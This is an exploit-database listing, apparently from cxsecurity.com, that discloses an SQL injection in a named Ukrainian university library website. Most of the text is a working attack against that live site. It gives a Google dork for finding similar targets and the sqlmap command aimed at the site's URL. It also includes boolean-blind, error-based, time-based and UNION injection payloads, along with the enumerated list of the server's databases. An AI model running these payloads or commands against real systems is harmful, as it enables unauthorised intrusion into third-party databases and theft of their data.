VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability

2021.04.18
tr Emyounoone (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: read.php?id=

# Exploit Title: VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability # Author: Emyounoone # Date: 17/04/2021 # Tested On: Kali Linux # Contact: https://instagram.com/emyounoone # Google Dork: read.php?id= ---------------------------------------------------------------------------------------------------- # Vulnerable Path: http://lib.pnu.edu.ua/read.php?id=1 # python3 sqlmap.py http://lib.pnu.edu.ua/read.php?id=1 --dbs --random-agent --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (7097=7097) THEN 1 ELSE (SELECT 4010 UNION SELECT 4511) END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 OR (SELECT 4232 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(4232=4232,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: id=1 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 24 columns Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707171,0x59474b73796f7a6d4b66707a765662487349776548564c43526f6868596b446a4f587847704a7173,0x71706a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- available databases [7]: [*] c3lib [*] information_schema [*] my [*] mysql [*] performance_schema [*] phpmyadmin [*] sys


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top